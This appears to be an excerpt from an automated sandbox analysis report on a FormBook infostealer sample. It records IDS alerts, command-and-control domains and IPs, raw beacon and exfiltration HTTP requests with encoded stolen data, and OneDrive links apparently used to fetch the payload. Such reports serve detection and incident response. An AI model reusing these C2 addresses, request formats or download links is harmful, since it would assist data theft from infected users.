Source: C:\Windows\explorer.exe | Network Connect: 188.114.97.3 80
Source: C:\Windows\explorer.exe | Network Connect: 156.226.60.131 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Domain query: www.designgamagazine.com
Source: C:\Windows\explorer.exe | Domain query: www.shopwithtrooperdavecom.com
Source: C:\Windows\explorer.exe | Network Connect: 2.57.90.16 80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49839 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49849 -> 198.54.117.218:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49850 -> 2.57.90.16:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49861 -> 38.54.163.57:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49863 -> 15.197.142.173:80
Source: C:\Windows\explorer.exe | DNS query: www.trisuaka.xyz
Source: Malware configuration extractor | URLs: www.nutricognition.com/uj3c/
Source: Joe Sandbox View | ASN Name: STRATOSTRATOAGDE
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=YWpgW+COIZOeD7RBAds2ahhkbsB0iwv6LNJvq1IjxaRtw/JoYlxZSXI6K9FgH36jX673 HTTP/1.1 | Host: www.meigsbuilds.online | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uj3c/?r4S0P=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&aN68=XPUturKxIt HTTP/1.1 | Host: www.naturathome.info | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=aJ6ZN5DW6YxDAHX5hoqiKthR1Q3Gyr9jYIHooZSiQRwJPZTqb166CSRFwQJEcQMMTPqy HTTP/1.1 | Host: www.nutricognition.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1 | Host: www.designgamagazine.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1 | Host: www.kidsfundoor.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1 | Host: www.empireapothecary.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1 | Host: www.moneytaoism.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1 | Host: www.moneytaoism.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1 | Host: www.trendiddas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1 | Host: www.trisuaka.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1 | Host: www.nomaxdic.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 81.169.145.158
Source: global traffic | HTTP traffic detected: POST /uj3c/ HTTP/1.1 | Host: www.trisuaka.xyz | Connection: close | Content-Length: 411 | Cache-Control: no-cache | Origin: http://www.trisuaka.xyz | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.trisuaka.xyz/uj3c/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ). (followed by 8 NUL bytes)
Source: global traffic | HTTP traffic detected: POST /uj3c/ HTTP/1.1 | Host: www.trisuaka.xyz | Connection: close | Content-Length: 36479 | Cache-Control: no-cache | Origin: http://www.trisuaka.xyz | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.trisuaka.xyz/uj3c/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw (truncated in the report): 72 34 53 30 50 3d 75 46 58 50 6c 70 76 6c 41 59 36 6e 34 46 6e 4d 51 32 63 47 63 43 41 35 37 69 73 39 4d 42 72 63 35 6c 42 68 4f 4a 41 31 44 39 30 30 70 66 47 2d 43 68 70 64 61 5f 39 69 4b 56 62 71 4f 76 34 4c 70 38 34 70 4e 30 45 76 59 7a 46 31 66 78 56 4d 63 50 33 66 57 6b 63 33 32 43 7a 32 32 6e 63 79 44 34 77 4c 52 44 44 37 61 5f 78 78 72 68 4d 43 35 64 61 71 79 34 72 79 47 65 6f 41 49 44 46 2d 55 38 64 61 73 63 77 63 6f 76 62 66 53 58 78 2d 28 55 4e 76 4d 4a 4e 54 73 74 56 45 45 6a 74 4c 78 6a 53 7a 64 6b 47 6c 71 2d 31 44 28 33 33 38 66 64 57 56 47 31 32 30 44 77 6e 72 70 6a 4f 50 76 78 52 45 6e 59 6e 70 65 54 6b 39 4e 31 66 63 61 72 4e 5f 70 5a 47 53 64 6c 33 55 4d 66 6b 78 62 68 75 51 35 43 43 64 65 48 51 31 7a 45 53 36 49 64 50 4d 43 71 69 30 7a 47 6b 6c 58 62 46 4a 4d 57 37 50 38 57 45 56 42 6b 5a 53 6f 43 72 6e 4a 32 61 6f 73 75 75 64 36 48 6e 46 34 77 6b 68 63 37 77 33 4f 38 68 39 63 77 53 53 66 77 73 5a 65 6e 63 48 31 7a 68 39 6a 68 62 4e 45 53 47 52 52 6a 45 62 75 52 4f 4c 33 51 39 74 65 49 68 46 38 79 31 73 78 68 43 68 44 6a 51 55 73 32 35 48 44 31 6a 55 65 6b 6c 52 4c 67 62 5f 37 56 5a 71 7a 49 42 73 50 39 5a 30 77 61 34 38 31 6a 68 71 56 79 32 58 42 69 54 4c 6e 4d 47 52 28 65 58 37 38 31 4f 5f 4d 63 44 44 63 66 6c 53 6a 56 6b 67 56 72 7a 56 67 4a 51 53 4b 64 76 34 37 51 77 65 73 53 38 4d 47 73 28 39 48 4e 64 4c 4b 6c 73 48 58 37 4e 54 6e 30 49 4e 37 6b 52 74 71 5 50 32 61 71 45 33 46 72 52 61 78 58 36 7a 47 52 31 30 61 47 36 44 33 5a 41 4f 4e 74 57 74 72 5f 70 43 35 48 57 32 6a 4c 54 53 73 44 66 65 47 5a 41 37 49 6a 30
67 68 53 31 78 6c 33 7a 4e 73 39 65 4c 57 59 6a 77 6b 47 46 33 70 35 67 66 56 4a 69 74 66 36 6a 7a 66 4b 50 6c 70 4d 57 48 31 4b 66 46 70 50 50 73 32 31 41 59 47 41 4f 73 4a 34 6d 58 33 6b 48 51 69 6a 74 41 45 70 53 4f 4c 71 75 69 64 35 56 31 41 62 4e 68 58 53 6e 5f 32 68 39 49 47 51 39 75 46 41 44 39 38 71 4b 70 79 62 5a 4e 30 35 4a 59 4e 31 38 4f 4b 61 4a 68 35 74 45 6e 44 35 6d 57 44 6c 49 66 79 58 33 57 71 41 44 52 43 76 67 6f 41 55 73 69 6e 6a 4f 31 4c 43 75 55 53 5a 65 77 6e 48 44 6c 6e 75 4c 74 32 4f 4c 39 47 30 6e 63 58 42 67 5f 57 34 66 33 76 39 45 34 69 33 57 62 65 59 55 64 50 6c 48 53 6e 72 6c 72 34 4e 45 47 76 4d 44 5f 53 69 5a 79 71 75 62 5f 61 6f 49 74 4b 56 6d 76 5a 65 78 74 6e 42 38 61 6a 30 6c 64 52 38 36 48 42 6a 39 48 6e 38 4b 59 42 2d 4c 77 65 78 79 68 32 50 32 58 6e 52 35 61 66 64 55 4b 33 41 64 50 72 2d 4e 74 7e 67 54 30 4d 30 79 68 48 6e 71 4b 4f 67 74 62 68 76 48 42 4b 4e 5a 77 63 47 78 2d 4f 71 4f 6e 72 35 58 6b 48 34 45 35 4b 51 59 4d 36 2d 7e 5f 52 79 35 54 74 6f 74 6e 6d 71 6c 45 51 67 34 4a
            Source: global trafficHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.nomaxdic.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.nomaxdic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nomaxdic.com/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4a 62 38 4a 4b 53 6d 76 30 4a 45 72 42 64 57 36 54 30 64 75 5a 46 55 50 30 45 57 6d 41 39 4d 55 65 37 49 56 67 7a 5f 59 65 53 6e 6f 70 74 53 77 6b 73 6e 44 49 37 4b 65 66 77 77 6b 5a 4a 36 77 67 66 49 6e 65 43 68 7a 58 70 75 77 6d 31 59 75 71 51 41 69 63 73 76 62 55 50 72 61 52 4c 37 47 58 6e 50 7a 6f 54 43 43 45 52 59 31 4e 33 53 31 67 77 41 53 48 41 36 4b 75 76 6a 33 73 68 38 71 48 39 6f 45 4e 48 48 77 56 57 79 69 44 69 48 39 69 76 32 57 78 57 52 6a 47 76 6a 44 6c 6a 4c 34 6a 4a 4d 43 4c 57 45 74 69 6a 69 4c 44 47 46 66 4a 67 68 54 5f 7a 4a 7a 71 69 76 65 7a 33 33 4c 55 47 72 77 34 39 53 74 69 74 2d 36 4a 53 4b 68 56 37 54 6b 59 61 43 33 73 62 4e 76 53 4e 49 66 4f 44 33 55 76 76 35 74 49 45 6e 51 31 53 75 53 56 71 37 7a 72 64 63 75 4d 6d 4c 79 32 5a 32 69 34 6f 54 70 67 48 6d 46 67 33 59 58 6c 45 58 61 2d 33 57 30 67 70 39 6d 33 34 34 28 67 4b 42 78 6d 49 5a 4e 58 37 51 6e 32 34 6c 79 39 5a 71 45 53 4e 75 71 54 6a 37 69 71 48 73 4e 5f 55 34 69 43 5a 6c 4c 65 61 74 53 39 38 2d 28 50 6e 68 4d 45 53 78 52 79 51 6e 6e 35 68 79 55 58 4e 75 63 30 7e 51 51 53 4e 52 6a 74 6f 36 76 52 67 6a 46 51 48 44 6c 70 35 74 61 68 48 44 30 6c 63 6a 69 58 79 37 52 4c 45 36 55 61 75 72 55 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
r4S0P=vFqnDJb8JKSmv0JErBdW6T0duZFUP0EWmA9MUe7IVgz_YeSnoptSwksnDI7KefwwkZJ6wgfIneChzXpuwm1YuqQAicsvbUPraRL7GXnPzoTCCERY1N3S1gwASHA6Kuvj3sh8qH9oENHHwVWyiDiH9iv2WxWRjGvjDljL4jJMCLWEtijiLDGFfJghT_zJzqivez33LUGrw49Stit-6JSKhV7TkYaC3sbNvSNIfOD3Uvv5tIEnQ1SuSVq7zrdcuMmLy2Z2i4oTpgHmFg3YXlEXa-3W0gp9m344(gKBxmIZNX7Qn24ly9ZqESNuqTj7iqHsN_U4iCZlLeatS98-(PnhMESxRyQnn5hyUXNuc0~QQSNRjto6vRgjFQHDlp5tahHD0lcjiXy7RLE6UaurUQ).
            Source: global trafficHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.nomaxdic.comConnection: closeContent-Length: 36479Cache-Control: no-cacheOrigin: http://www.nomaxdic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nomaxdic.com/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4d 6a 75 4e 36 7e 7a 71 6b 46 76 70 30 51 56 69 54 6b 66 76 6f 78 4c 44 57 41 4a 78 42 4e 69 4c 4c 28 66 55 6c 48 68 50 65 50 6f 73 75 68 77 77 6d 30 65 4f 64 54 4f 61 2d 4d 5f 6b 5a 78 41 77 67 54 49 67 65 72 2d 77 30 52 51 77 44 68 62 6f 4b 51 53 77 4d 73 6d 52 77 50 57 61 52 66 6a 47 58 75 43 7a 59 76 43 44 6d 5a 59 68 2d 76 62 74 67 77 5a 52 44 6b 32 56 2d 6a 2d 33 73 70 65 71 46 70 6f 44 39 62 48 78 77 65 7a 67 45 32 45 37 79 76 7a 54 78 58 42 74 6d 6a 33 44 6c 58 6c 34 69 6c 4d 46 35 69 45 74 7a 44 69 61 51 65 45 4c 70 67 6b 42 50 7a 2d 33 71 65 36 65 7a 72 7a 4c 51 28 51 7a 4e 56 53 76 53 74 5f 7e 61 44 33 32 53 62 45 33 59 75 6c 33 70 43 70 76 6e 74 51 66 4d 58 50 58 63 6e 4a 69 4b 73 42 51 7a 4b 45 43 46 71 5f 34 4c 64 39 75 4d 6d 72 79 32 5a 63 69 34 34 54 70 6a 6e 6d 46 46 37 59 42 58 38 51 44 2d 33 54 39 41 6f 36 69 33 31 44 28 67 69 72 78 6a 39 43 4d 67 44 51 68 6a 63 6c 33 38 5a 74 49 79 4e 73 6b 7a 6a 69 35 36 48 76 4e 5f 55 61 69 44 5a 31 4d 74 65 74 41 59 49 2d 34 74 28 68 4f 30 53 78 49 43 51 6c 73 5a 74 69 55 58 46 51 63 78 43 6d 51 6c 56 52 69 2d 67 36 68 51 67 6a 45 41 48 44 74 4a 34 73 4c 30 36 75 7a 56 49 4e 77 31 7e 32 62 38 64 33 5a 5a 75 67 44 4e 72 6a 6a 33 36 6b 59 37 39 78 61 41 39 5f 69 69 28 7a 58 30 67 71 52 42 57 57 28 68 55 68 31 48 39 55 55 73 41 5a 48 71 72 52 61 63 6f 32 7a 46 52 4a 70 37 51 79 4a 43 58 55 53 63 5a 45 35 4a 68 66 62 65 78 67 46 52 5a 32 43 7a 78 73 73 39 71 5f 68 71 76 50 72 63 31 77 44 43 53 55 37 6d 47 48 57 79 78 6b 78 42 7a 73 56 63 52 65 36 71 65 
6f 54 62 7e 64 70 39 63 48 58 41 48 32 28 49 7e 4d 31 46 7a 48 69 74 48 58 49 6f 36 6f 51 65 54 38 6b 47 79 65 62 6b 4e 63 63 74 70 56 6c 4c 65 45 6f 74 53 78 39 55 68 6c 33 30 32 77 75 30 6c 34 6e 37 63 6d 59 67 42 51 72 36 73 4d 7a 77 37 4a 6b 67 32 59 42 43 7a 7a 67 68 5a 50 47 6a 75 55 6d 42 6a 35 52 6d 30 42 72 33 51 4d 55 61 6e 4b 71 54 76 59 76 55 64 49 73 4d 45 74 56 43 65 2d 6b 42 58 54 65 44 4b 64 44 66 74 62 78 63 64 66 68 36 45 68 54 6d 6e 51 34 65 71 49 63 6b 78 4d 38 30 51 62 77 45 4f 66 38 67 34 73 53 50 4f 52 39 62 51 44 78 33 61 38 73 7a 54 30 69 73 70 4f 31 4a 30 65 5a 70 43 56 58 37 36 49 4e 52 69 34 46 30 77 76 67 6b 36 30 6f 48 51 5a 45 62 6b 50 57 58 71 6d 32 62 50 50 54 32 49 41 6c 53 77 61 67 68 76 39 4f 48 6d 53 79 6b 59 7a 51 69 4f 74 4a 67 6f 6a 73 5f 6d 6d 57 6c 4c 71 6c 61 79 53 7e 47 64 76 71 52 59 78 75 4f 56 79 47 75 47 52 79 69 35 6c 68 6f 77 64 68 62 65 36 41 65 57 6e 56 73 66 63 77 50 35 46 6e 61 4d 4f 30 6d 28 5f 6c 5f 52 54 63 67 6e 79 4d 31 47 4d 55 7a 77 76 38 52 50 35 31 4c 71 51
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 08 Aug 2022 18:14:24 GMTContent-Type: text/htmlContent-Length: 291ETag: "62f13bce-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Aug 2022 18:14:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 18:15:12 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 72 65 6e 64 69 64 64 61 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.trendiddas.com Port 80</address></body></html>
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: TR0627729920002.exe, Jwjxmakrv.exe.0.dr String found in binary or memory: http://www.emerge.deDVarFileInfo$
            Source: rundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.nomaxdic.com
            Source: rundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.nomaxdic.com/uj3c/
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/9
            Source: Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/dK
            Source: Jwjxmakrv.exe, 0000000E.00000003.316208412.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mAWAqMZkm6zn3dSzDj3WPCBsX3RiZWbRG2DylLyNQaP0-LRMHmuxHvvhn3WeqC6Ib
            Source: Jwjxmakrv.exe, 00000008.00000003.290900186.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa
            Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzP
            Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV51
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.296621597.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.289435198.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.325315312.000000000090C000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.317690202.0000000000900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xB
            Source: Jwjxmakrv.exe, 0000000E.00000003.319396319.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mzqjhhxuQPPuOmBSzbYlb6397m5X2vhHIqRXXBSV57d_1VgTXNCbbqjd0KHfm6XfB
            Source: Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/2A
            Source: Jwjxmakrv.exe, 0000000E.00000002.354269896.0000000003598000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/k
